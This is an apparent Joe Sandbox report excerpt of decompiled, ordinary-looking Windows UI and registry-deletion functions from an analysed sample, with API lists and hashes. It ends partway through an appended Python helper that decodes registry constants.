      								_t45 = _t75 + 0x58;
      								 *_t45 =  *(_t75 + 0x58) & 0xffffffe7;
      								__eflags =  *_t45;
      								return  *((intOrPtr*)(_t75 + 0x60));
      							} else {
      								_push(_v20);
      								_t56 = E009B2E3B(_t69, _t71, 0, _t75, _t83);
      								_pop(_t70);
      								if(_t56 != 0) {
      									_v16 = 1;
      									_v12 = 0;
      								}
      								if(PeekMessageA(_v20, 0, 0, 0, 0) == 0) {
      									while(1) {
      										_t78 = _v16;
      										if(_v16 == 0) {
      											goto L15;
      										}
      										goto L4;
      									}
      								}
      								continue;
      							}
      						}
      						_push(0);
      						E009B17FA();
      						return _t51 | 0xffffffff;
      						L4:
      						__eflags = PeekMessageA(_v20, 0, 0, 0, 0);
      						if(__eflags != 0) {
      							goto L15;
      						} else {
      							__eflags = _v8;
      							if(_v8 != 0) {
      								_t70 = _t75;
      								E009B0BD1(_t75, 1);
      								UpdateWindow( *(_t75 + 0x20));
      								_v8 = 0;
      							}
      							__eflags = _a4 & 0x00000001;
      							if((_a4 & 0x00000001) == 0) {
      								__eflags = _v24;
      								if(_v24 != 0) {
      									__eflags = _v12;
      									if(_v12 == 0) {
      										SendMessageA(_v24, 0x121, 0,  *(_t75 + 0x20));
      									}
      								}
      							}
      							__eflags = _a4 & 0x00000002;
      							if(__eflags != 0) {
      								L13:
      								_v16 = 0;
      								continue;
      							} else {
      								_t62 = SendMessageA( *(_t75 + 0x20), 0x36a, 0, _v12);
      								_v12 = _v12 + 1;
      								__eflags = _t62;
      								if(__eflags != 0) {
      									continue;
      								}
      								goto L13;
      							}
      						}
      					}
      				}
      				_t66 = E009B0A7A(__ecx);
      				_v8 = 1;
      				_t77 = _t66 & 0x10000000;
      				if((_t66 & 0x10000000) == 0) {
      					goto L3;
      				}
      				goto L2;
      			}

      APIs
      • GetParent.USER32(?), ref: 009AC500
      • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 009AC524
      • UpdateWindow.USER32(?), ref: 009AC53F
      • SendMessageA.USER32 ref: 009AC560
      • SendMessageA.USER32 ref: 009AC578
      • UpdateWindow.USER32(?), ref: 009AC5BB
      • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 009AC5EC
        • Part of subcall function 009B0A7A: GetWindowLongA.USER32 ref: 009B0A85
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Message$Window$PeekSendUpdate$LongParent
      • String ID:
      • API String ID: 2853195852-0
      • Opcode ID: de12250d3d2fd2d1e9e9c57f82e743a723cda140c0bd89b4a9af4c637e965813
      • Instruction ID: a7e03440e46d26e1ee5e9bbd478ab75b29edb979cc6187805a6076c057bc3f97
      • Opcode Fuzzy Hash: de12250d3d2fd2d1e9e9c57f82e743a723cda140c0bd89b4a9af4c637e965813
      • Instruction Fuzzy Hash: 5E4180B0E04249ABCF219FA5CD48AAEBBF8FF82754F104559F442AA160D7719A40DB90
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 96%
      			E009D70FC(void* __ebx, void* __edx, void* __eflags, long _a4, signed int _a8, long _a12, long _a16, intOrPtr _a20, signed int _a24) {
      				signed int _v8;
      				void* __ecx;
      				void* __ebp;
      				long _t32;
      				signed int _t34;
      				void* _t41;
      				struct tagBITMAPINFOHEADER _t50;
      				signed int _t51;
      				void* _t53;
      				long _t55;
      				void* _t61;
      				void* _t63;
      				BITMAPINFO* _t66;
      				signed int _t67;
      				signed int _t69;
      				signed int _t70;
      
      				_t61 = __edx;
      				_push(_t53);
      				_v8 = _v8 & 0x00000000;
      				_t63 = _t53;
      				_t66 = E009B947A(__ebx,  &_v8, __eflags, 0x428);
      				if(_t66 != 0) {
      					_push(__ebx);
      					_t50 = 0x28;
      					E00AAB3F0(_t66, 0, _t50);
      					_t55 = _a16;
      					_t66->bmiHeader.biWidth = _a4;
      					_t66->bmiHeader.biPlanes = 1;
      					_t32 = _a12;
      					_t66->bmiHeader = _t50;
      					_t51 = _a8;
      					_t66->bmiHeader.biHeight = _t51;
      					_t66->bmiHeader.biBitCount = _t32;
      					_t66->bmiHeader.biCompression = _t55;
      					__eflags = _t32 - 8;
      					if(_t32 > 8) {
      						__eflags = _t55 - 3;
      						if(_t55 == 3) {
      							_t16 =  &(_t66->bmiColors); // 0x28
      							E009A6677(_t55, E00AAC44E(_t16, 0xc, _a20, 0xc));
      						}
      					} else {
      						_t14 =  &(_t66->bmiColors); // 0x28
      						E00AAB3F0(_t14, 0, 0x400);
      					}
      					_t17 = _t63 + 8; // 0x8
      					_t34 = CreateDIBSection(0, _t66, 0, _t17, 0, 0);
      					__eflags = _t34;
      					if(_t34 != 0) {
      						 *(_t63 + 4) = _t34;
      						__eflags = _t51;
      						E009D539C(_t63, _t61, (0 | _t51 > 0x00000000) + 1);
      						__eflags = _a24 & 0x00000001;
      						if((_a24 & 0x00000001) != 0) {
      							 *((char*)(_t63 + 0x1d)) = 1;
      						}
      						_t67 = _v8;
      						while(1) {
      							__eflags = _t67;
      							if(_t67 == 0) {
      								break;
      							}
      							_t67 =  *_t67;
      							E00AAB4AB(_t67);
      						}
      						_t41 = 1;
      						__eflags = 1;
      						goto L20;
      					} else {
      						_t69 = _v8;
      						while(1) {
      							__eflags = _t69;
      							if(_t69 == 0) {
      								break;
      							}
      							_t69 =  *_t69;
      							E00AAB4AB(_t69);
      						}
      						_t41 = 0;
      						L20:
      						L21:
      						return _t41;
      					}
      				}
      				_t70 = _v8;
      				while(_t70 != 0) {
      					_t70 =  *_t70;
      					E00AAB4AB(_t70);
      				}
      				_t41 = 0;
      				goto L21;
      			}

      APIs
        • Part of subcall function 009B947A: _malloc.LIBCMT ref: 009B948D
      • _free.LIBCMT ref: 009D7125
      • _memset.LIBCMT ref: 009D713E
      • _memset.LIBCMT ref: 009D7178
      • _memcpy_s.LIBCMT ref: 009D7192
      • CreateDIBSection.GDI32(00000000,00000000,00000000,00000008,00000000,00000000), ref: 009D71AB
      • _free.LIBCMT ref: 009D71BD
      • _free.LIBCMT ref: 009D71F0
        • Part of subcall function 00AAB4AB: HeapFree.KERNEL32(00000000,00000000,?,00AAAEFC,?), ref: 00AAB4C1
        • Part of subcall function 00AAB4AB: GetLastError.KERNEL32(?,?,00AAAEFC,?), ref: 00AAB4D3
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: _free$_memset$CreateErrorFreeHeapLastSection_malloc_memcpy_s
      • String ID:
      • API String ID: 2204576675-0
      • Opcode ID: 74c017a606ba0b1d019389914fae5be5de9974984b7f6fe7936b19bfe3f1940e
      • Instruction ID: 06e98ae9d3f09a0e05147dbbc8094a8c13b0f3200054354b0f8d25892ba0cdfc
      • Opcode Fuzzy Hash: 74c017a606ba0b1d019389914fae5be5de9974984b7f6fe7936b19bfe3f1940e
      • Instruction Fuzzy Hash: EB31C872958615ABDB20DFA4CC41B6BF7ACEF15360F11891AF845E7341E774ED0187A0
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 98%
      			E00A04EFF(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
      				signed int _t94;
      				struct tagRECT* _t98;
      				intOrPtr _t117;
      				void* _t118;
      				void* _t119;
      
      				_t119 = __eflags;
      				_t113 = __edx;
      				_push(4);
      				E00AAD232(0xacc4c7, __ebx, __edi, __esi);
      				_t117 = __ecx;
      				 *((intOrPtr*)(_t118 - 0x10)) = __ecx;
      				E009AB862(__ecx, __edx, _t119);
      				 *((intOrPtr*)(_t118 - 4)) = 0;
      				 *((intOrPtr*)(__ecx)) = 0xae1b34;
      				E00A4FCE6(__ebx, __ecx + 0x74, __edx, 0, __ecx, _t119);
      				 *((char*)(_t118 - 4)) = 1;
      				E00A8494A(_t117 + 0x104, __edx, _t119);
      				 *((char*)(_t118 - 4)) = 2;
      				E00A840AA(_t117 + 0x1b0, _t119);
      				 *((char*)(_t118 - 4)) = 3;
      				E009AB862(_t117 + 0x244, _t113, _t119);
      				 *((intOrPtr*)(_t117 + 0x244)) = 0xadccb4;
      				 *((char*)(_t118 - 4)) = 4;
      				E009A5D70(_t117 + 0x2d0, _t113, E009B9D52());
      				 *((char*)(_t118 - 4)) = 5;
      				E009A5D70(_t117 + 0x2d4, _t113, E009B9D52());
      				 *((intOrPtr*)(_t117 + 0x2e4)) = 0;
      				 *((intOrPtr*)(_t117 + 0x2e0)) = 0xad7e54;
      				_t98 = _t117 + 0x2e8;
      				_t98->left = 0;
      				_t98->top = 0;
      				_t98->right = 0;
      				_t98->bottom = 0;
      				 *(_t117 + 0x328) = 0;
      				 *((intOrPtr*)(_t117 + 0x32c)) = 0;
      				 *((intOrPtr*)(_t117 + 0x330)) = 0;
      				 *((intOrPtr*)(_t117 + 0x334)) = 0;
      				 *(_t117 + 0x338) = 0;
      				 *((intOrPtr*)(_t117 + 0x33c)) = 0;
      				 *((intOrPtr*)(_t117 + 0x340)) = 0;
      				 *((intOrPtr*)(_t117 + 0x344)) = 0;
      				E00A007A2(_t117 + 0x360, 0xa);
      				E00A007A2(_t117 + 0x37c, 0xa);
      				 *((intOrPtr*)(_t117 + 0x3c0)) = 0;
      				 *((intOrPtr*)(_t117 + 0x3bc)) = 0xada220;
      				 *(_t117 + 0x2f8) =  *(_t117 + 0x2f8) | 0xffffffff;
      				 *((char*)(_t118 - 4)) = 0xa;
      				 *((intOrPtr*)(_t117 + 0x2dc)) = 0;
      				 *((intOrPtr*)(_t117 + 0x304)) = 0;
      				 *((intOrPtr*)(_t117 + 0x308)) = 0;
      				 *((intOrPtr*)(_t117 + 0x2b8)) = 1;
      				 *((intOrPtr*)(_t117 + 0x2bc)) = 0;
      				 *((intOrPtr*)(_t117 + 0x2fc)) = 3;
      				 *((intOrPtr*)(_t117 + 0x2c4)) = 0;
      				 *((intOrPtr*)(_t117 + 0x2c8)) = 0;
      				SetRectEmpty(_t98);
      				 *((intOrPtr*)(_t117 + 0x318)) = 0;
      				SetRectEmpty(_t117 + 0x328);
      				SetRectEmpty(_t117 + 0x338);
      				 *((intOrPtr*)(_t117 + 0x314)) = 0;
      				 *((intOrPtr*)(_t117 + 0x310)) = 0;
      				 *((intOrPtr*)(_t117 + 0x31c)) = 0;
      				 *((intOrPtr*)(_t117 + 0x320)) = 0;
      				 *((intOrPtr*)(_t117 + 0x324)) = 0;
      				 *((intOrPtr*)(_t117 + 0x398)) = 0;
      				 *((intOrPtr*)(_t117 + 0x350)) = 0;
      				 *((intOrPtr*)(_t117 + 0x300)) = 0;
      				 *((intOrPtr*)(_t117 + 0x2c0)) = 1;
      				 *((intOrPtr*)(_t117 + 0x348)) = 0;
      				 *((intOrPtr*)(_t117 + 0x34c)) = 0;
      				E009A6000(_t113, 0, "True");
      				_t94 = E009A6000(_t113, 0, "False") | 0xffffffff;
      				 *(_t117 + 0x3a0) = _t94;
      				 *(_t117 + 0x3a4) = _t94;
      				 *(_t117 + 0x3a8) = _t94;
      				 *(_t117 + 0x3ac) = _t94;
      				 *(_t117 + 0x3b0) = _t94;
      				 *(_t117 + 0x3b4) = _t94;
      				 *(_t117 + 0x3b8) = _t94;
      				 *((char*)(_t117 + 0x2d8)) = 0x2c;
      				 *((intOrPtr*)(_t117 + 0x354)) = 0;
      				 *((intOrPtr*)(_t117 + 0x358)) = 1;
      				 *((intOrPtr*)(_t117 + 0x35c)) = 1;
      				 *((intOrPtr*)(_t117 + 0x2cc)) = 0;
      				 *((intOrPtr*)(_t117 + 0x3c4)) = 0;
      				 *((char*)(_t117 + 0x24)) = 1;
      				return E00AAD30A(_t117);
      			}

      APIs
      • __EH_prolog3.LIBCMT ref: 00A04F06
        • Part of subcall function 00A4FCE6: __EH_prolog3.LIBCMT ref: 00A4FCED
        • Part of subcall function 00A840AA: SetRectEmpty.USER32(?), ref: 00A840DA
      • SetRectEmpty.USER32(?), ref: 00A0504E
      • SetRectEmpty.USER32(?), ref: 00A0505D
      • SetRectEmpty.USER32(?), ref: 00A05066
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: EmptyRect$H_prolog3
      • String ID: False$True
      • API String ID: 3752103406-1895882422
      • Opcode ID: c262fdc66379e58c9133a5e7a7989e0d27789253b05392d7e5f8d28e4dfd0cf1
      • Instruction ID: af2027081d51ddf3829a3ecbf59c4fa5511a81309e834f37861968a65633b76e
      • Opcode Fuzzy Hash: c262fdc66379e58c9133a5e7a7989e0d27789253b05392d7e5f8d28e4dfd0cf1
      • Instruction Fuzzy Hash: 4C518DB0801B408FC366DF7AC5857DAFBE8BFA5700F50495ED1AE962A1DBB02644CF51
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 96%
      			E009ACA5F(intOrPtr* __ecx, void* __edx) {
      				signed int _v8;
      				struct HWND__* _v44;
      				struct HWND__* _v48;
      				intOrPtr _v52;
      				void* _v56;
      				void* __ebx;
      				void* __edi;
      				void* __esi;
      				void* __ebp;
      				signed int _t34;
      				long _t48;
      				struct HWND__* _t53;
      				long _t66;
      				intOrPtr* _t68;
      				signed int _t69;
      				void* _t76;
      				void* _t77;
      				intOrPtr _t79;
      				intOrPtr* _t80;
      				signed int _t81;
      
      				_t76 = __edx;
      				_t34 =  *0xd0c910; // 0x3a0e8b0c
      				_v8 = _t34 ^ _t81;
      				_t80 = __ecx;
      				_t77 = E009B2B03();
      				if(_t77 != 0) {
      					if( *((intOrPtr*)(_t77 + 0x20)) == __ecx) {
      						 *((intOrPtr*)(_t77 + 0x20)) = 0;
      					}
      					if( *((intOrPtr*)(_t77 + 0x24)) == _t80) {
      						 *((intOrPtr*)(_t77 + 0x24)) = 0;
      					}
      				}
      				_t68 =  *((intOrPtr*)(_t80 + 0x64));
      				if(_t68 != 0) {
      					 *((intOrPtr*)( *_t68 + 0x50))();
      					 *((intOrPtr*)(_t80 + 0x64)) = 0;
      				}
      				_t69 =  *(_t80 + 0x68);
      				if(_t69 != 0) {
      					 *((intOrPtr*)( *_t69 + 4))(1);
      				}
      				 *(_t80 + 0x68) =  *(_t80 + 0x68) & 0x00000000;
      				_t92 =  *(_t80 + 0x58) & 1;
      				if(( *(_t80 + 0x58) & 1) != 0) {
      					_t79 =  *((intOrPtr*)(E009BD7B2(1, _t69, _t77, _t80, _t92) + 0x3c));
      					if(_t79 != 0) {
      						_t94 =  *(_t79 + 0x20);
      						if( *(_t79 + 0x20) != 0) {
      							E00AAB3F0( &_v56, 0, 0x30);
      							_t53 =  *(_t80 + 0x20);
      							_v48 = _t53;
      							_v44 = _t53;
      							_v56 = 0x2c;
      							_v52 = 1;
      							SendMessageA( *(_t79 + 0x20), 0x405, 0,  &_v56);
      						}
      					}
      				}
      				_t78 = GetWindowLongA;
      				_t66 = GetWindowLongA( *(_t80 + 0x20), 0xfffffffc);
      				E009AC865(_t66, _t80, GetWindowLongA, _t94);
      				if(GetWindowLongA( *(_t80 + 0x20), 0xfffffffc) == _t66) {
      					_t48 =  *( *((intOrPtr*)( *_t80 + 0xfc))());
      					if(_t48 != 0) {
      						SetWindowLongA( *(_t80 + 0x20), 0xfffffffc, _t48);
      					}
      				}
      				E009AC996(_t66, _t80, _t76);
      				return E00AAB46A( *((intOrPtr*)( *_t80 + 0x120))(), _t66, _v8 ^ _t81, _t76, _t78, _t80);
      			}

      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: LongWindow$MessageSend_memset
      • String ID: ,
      • API String ID: 2997958587-3772416878
      • Opcode ID: 540f08a27eb566def3282fd91fad05a9383d8170adb1706efc0cd862a957a1cd
      • Instruction ID: 8fe64429ec2397a384bcb536b4d6c1352259572a2efaa889a4e1ae40dca8df6f
      • Opcode Fuzzy Hash: 540f08a27eb566def3282fd91fad05a9383d8170adb1706efc0cd862a957a1cd
      • Instruction Fuzzy Hash: 8D4170B56017089FCB24EF74D985AAAB7E8FF49710F15062DE5469B692DB30E800CB94
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 45%
      			E009B3D0B(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
      				long _t46;
      				long _t52;
      				void* _t59;
      				void* _t62;
      				void* _t78;
      				intOrPtr _t80;
      				intOrPtr _t82;
      				void* _t84;
      
      				_t78 = __edx;
      				_push(0x12c);
      				E00AAD2D1(0xac8383, __ebx, __edi, __esi);
      				_t82 =  *((intOrPtr*)(_t84 + 0x10));
      				 *((intOrPtr*)(_t84 - 0x124)) =  *((intOrPtr*)(_t84 + 8));
      				 *((intOrPtr*)(_t84 - 0x134)) = _t82;
      				_t6 = E009A6C6C( *((intOrPtr*)( *((intOrPtr*)(_t84 + 0xc)))) - 0x10) + 0x10; // 0x10
      				_t80 = _t6;
      				 *((intOrPtr*)(_t84 - 0x130)) = _t80;
      				 *((intOrPtr*)(_t84 - 4)) = 0;
      				if( *((intOrPtr*)(_t84 - 0x124)) == 0x80000000) {
      					_t59 = E009BD042();
      					_t89 = _t59 - 1;
      					if(_t59 == 1) {
      						_push(_t84 - 0x130);
      						_push("Software\\Classes\\");
      						_push(_t84 - 0x128);
      						_t62 = E009B3CA7(0, _t78, _t80, _t82, _t89);
      						 *((char*)(_t84 - 4)) = 1;
      						E009B2357(0, _t84 - 0x130, _t62);
      						 *((char*)(_t84 - 4)) = 0;
      						E009A5510( *((intOrPtr*)(_t84 - 0x128)) + 0xfffffff0, _t78);
      						_t80 =  *((intOrPtr*)(_t84 - 0x130));
      						 *((intOrPtr*)(_t84 - 0x124)) = 0x80000001;
      					}
      				}
      				_push(_t84 - 0x12c);
      				_push(0x2001f);
      				_push(0);
      				_push(_t80);
      				_push( *((intOrPtr*)(_t84 - 0x124)));
      				if(_t82 == 0) {
      					_t46 = RegOpenKeyExA();
      				} else {
      					_t46 = E009B3262(_t82);
      				}
      				_t83 = _t46;
      				if(_t46 != 0) {
      					L18:
      					_t37 = _t80 - 0x10; // 0x0
      					E009A5510(_t37, _t78);
      					return E00AAD32D(0, _t80, _t83);
      				} else {
      					while(1) {
      						_t83 = RegEnumKeyA( *(_t84 - 0x12c), 0, _t84 - 0x11c, 0x104);
      						_t93 = _t83;
      						if(_t83 != 0) {
      							break;
      						}
      						_push(_t84 - 0x11c);
      						 *((char*)(_t84 - 4)) = 2;
      						E009AFB60(0, _t84 - 0x128, _t78, _t80, _t83, _t93);
      						 *((char*)(_t84 - 4)) = 3;
      						_t83 = E009B3D0B(0, _t84 - 0x128, _t78, _t80, _t83, _t93,  *(_t84 - 0x12c), _t84 - 0x128,  *((intOrPtr*)(_t84 - 0x134)));
      						 *((char*)(_t84 - 0x11d)) = _t83 != 0;
      						E009A5510( *((intOrPtr*)(_t84 - 0x128)) + 0xfffffff0, _t78);
      						if( *((intOrPtr*)(_t84 - 0x11d)) == 0) {
      							 *((intOrPtr*)(_t84 - 4)) = 0;
      							continue;
      						}
      						 *((char*)(_t84 - 4)) = 0;
      						break;
      					}
      					if(_t83 == 0x103 || _t83 == 0x3f2) {
      						_t70 =  *((intOrPtr*)(_t84 - 0x134));
      						_push(_t80);
      						_push( *((intOrPtr*)(_t84 - 0x124)));
      						if( *((intOrPtr*)(_t84 - 0x134)) == 0) {
      							_t52 = RegDeleteKeyA();
      						} else {
      							_t52 = E009B39AA(_t70);
      						}
      						_t83 = _t52;
      					}
      					RegCloseKey( *(_t84 - 0x12c));
      					goto L18;
      				}
      			}

      Per-line instruction addresses (column collapsed): 0x009b3d0b to 0x009b3ed4

      APIs
      • __EH_prolog3_catch_GS.LIBCMT ref: 009B3D15
      • RegOpenKeyExA.ADVAPI32(80000000,00000010,00000000,0002001F,?), ref: 009B3DCC
        • Part of subcall function 009B3CA7: __EH_prolog3.LIBCMT ref: 009B3CAE
      • RegEnumKeyA.ADVAPI32(?,00000000,?,00000104), ref: 009B3DEF
      • RegCloseKey.ADVAPI32(?), ref: 009B3EBF
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: CloseEnumH_prolog3H_prolog3_catch_Open
      • String ID: Software\Classes\
      • API String ID: 854624316-1121929649
      • Opcode ID: 2324af6ae9a4f15594aa31522738e43d877a0e8be1f76ee4cc54d4c6bda8158e
      • Instruction ID: 674aec22f9d8c43765a613a5353c889440cc5e49844f661df057efa73bec67a7
      • Opcode Fuzzy Hash: 2324af6ae9a4f15594aa31522738e43d877a0e8be1f76ee4cc54d4c6bda8158e
      • Instruction Fuzzy Hash: EE416171D011689FCB21EBA48D94BEDBBB8AF49320F0481DAE549A3241D7349F95CF91
      Uniqueness

      Uniqueness Score: -1.00%
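The APIs list above leaves the hive handles, access masks and the two status codes that E009B3D0B tests (0x103 and 0x3f2) as bare hex. The helper below is added here and is not part of the Joe Sandbox report: it parses lines in the report's own `• Api.MODULE(args), ref: ADDR` format and names those constants from the documented Win32 values (winnt.h, winreg.h, winerror.h). The sample lines are copied from this report; the REG_ARGS table of argument positions is my own. Two points worth checking while reading the decompiled code: 0x3f2 is ERROR_BADKEY, not ERROR_KEY_DELETED (0x3fa), and 0x2001f is KEY_READ | KEY_WRITE, so the open at 009B3DCC already asks for write access to the key it is about to delete.

```python
"""Decode the registry constants in Joe Sandbox 'APIs' lines and decompiled
code. Added example, not part of the report. Constant values are the
documented ones from winnt.h / winreg.h / winerror.h."""
import re
from dataclasses import dataclass, field

API_LINE = re.compile(
    r"(?P<api>\w+)\.(?P<module>[\w.]+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)
HIVES = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
         0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS",
         0x80000005: "HKEY_CURRENT_CONFIG"}
STATUS = {0: "ERROR_SUCCESS", 2: "ERROR_FILE_NOT_FOUND", 5: "ERROR_ACCESS_DENIED",
          0x103: "ERROR_NO_MORE_ITEMS", 0x3F2: "ERROR_BADKEY", 0x3FA: "ERROR_KEY_DELETED"}
COMPOSITE_RIGHTS = [(0x20019, "KEY_READ"), (0x20006, "KEY_WRITE")]
SINGLE_RIGHTS = [(0x1, "KEY_QUERY_VALUE"), (0x2, "KEY_SET_VALUE"), (0x4, "KEY_CREATE_SUB_KEY"),
                 (0x8, "KEY_ENUMERATE_SUB_KEYS"), (0x10, "KEY_NOTIFY"), (0x20, "KEY_CREATE_LINK"),
                 (0x100, "KEY_WOW64_64KEY"), (0x200, "KEY_WOW64_32KEY"), (0x10000, "DELETE"),
                 (0x20000, "READ_CONTROL"), (0x40000, "WRITE_DAC"), (0x80000, "WRITE_OWNER")]
# My table: argument index of hKey and of samDesired (None when the call has no access mask).
REG_ARGS = {"RegOpenKeyExA": (0, 3), "RegOpenKeyExW": (0, 3), "RegCreateKeyExA": (0, 5),
            "RegCreateKeyExW": (0, 5), "RegEnumKeyA": (0, None), "RegEnumKeyW": (0, None),
            "RegDeleteKeyA": (0, None), "RegDeleteKeyW": (0, None), "RegQueryValueA": (0, None),
            "RegQueryValueExA": (0, None), "RegSetValueExA": (0, None), "RegCloseKey": (0, None)}


def decode_sam(mask):
    """Render samDesired as names; composites first, so 0x2001F reads as
    KEY_READ | KEY_WRITE instead of nine separate bits."""
    if mask == 0xF003F:
        return "KEY_ALL_ACCESS"
    matched = [(v, n) for v, n in COMPOSITE_RIGHTS if mask & v == v]
    names = [n for _, n in matched]
    rest = mask
    for v, _ in matched:            # composites share READ_CONTROL, so clear after matching all
        rest &= ~v
    for bit, name in SINGLE_RIGHTS:
        if rest & bit:
            names.append(name)
            rest &= ~bit
    if rest:
        names.append(f"0x{rest:x}")  # bits outside the table (e.g. generic rights)
    return " | ".join(names) if names else "0"


def decode_status(code):
    return STATUS.get(code, f"0x{code:x}")


@dataclass
class Call:
    api: str
    module: str
    ref: int                        # call-site address (the report's `ref:`)
    args: list
    notes: list = field(default_factory=list)


def _hex_arg(args, idx):
    if idx is None or idx >= len(args) or args[idx] == "?":   # '?' = not recovered by the sandbox
        return None
    try:
        return int(args[idx], 16)
    except ValueError:
        return None


def parse_api_line(line):
    """Parse one '• Api.MODULE(args), ref: ADDR' line; None if it is not a call line."""
    m = API_LINE.search(line)
    if not m:
        return None
    args = [a.strip() for a in m["args"].split(",")] if m["args"].strip() else []
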